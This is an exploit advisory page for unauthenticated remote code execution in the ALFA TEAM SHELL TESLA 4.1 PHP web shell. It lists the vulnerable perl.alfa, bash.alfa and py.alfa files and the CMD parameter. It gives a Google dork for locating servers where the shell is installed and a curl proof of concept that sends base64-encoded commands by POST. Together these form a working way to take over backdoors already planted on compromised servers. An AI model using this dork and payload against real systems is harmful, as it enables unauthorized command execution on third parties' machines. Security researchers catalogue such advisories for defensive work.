ALFA TEAM SHELL TESLA 4.1 - Remote Code Execution (Unauthenticated)

2021.12.19

Aryan Chehreghani (SG)

Risk: High

Local: Yes

Remote: Yes

CVE: N/A

CWE: N/A

Dork: inurl:/alfacgiapi intext:alfa

# Exploit Title: ALFA TEAM SHELL TESLA 4.1 - Remote Code Execution (Unauthenticated)
# Google Dork: inurl:/alfacgiapi intext:alfa
# Date: 2021-12-19
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: http://solevisible.com
# Software Link: https://phpshells.com/alfa-tesla-v4-1-shell
# Version: v4.1
# Tested on: Windows 10 Enterprise x64 , Linux

# [ About - ALFA TEAM SHELL TESLA ] :

#It is one of the most popular web shells used by hackers,They use it to access the server side.

# [ Vulnerable Files ] : 

# 1 . perl.alfa
# 2 . bash.alfa
# 3 . py.alfa

# [ Vulnerable Parameter ] : CMD

# [ Description ]:

#Execute commands without authentication or logging in to the web shell,
#To use, find only one of the vulnerable files,
#Convert your commands to base64 And Submit your request using the CMD parameter and the POST method.

# [ POC ] :

curl -d "cmd=bHMgLWxh" -X POST http://localhost/alfacgiapi/perl.alfa

See this note in RAW Version

Vote for this issue:

81%

19%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

ALFA TEAM SHELL TESLA 4.1 - Remote Code Execution (Unauthenticated)

Dork: inurl:/alfacgiapi intext:alfa

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.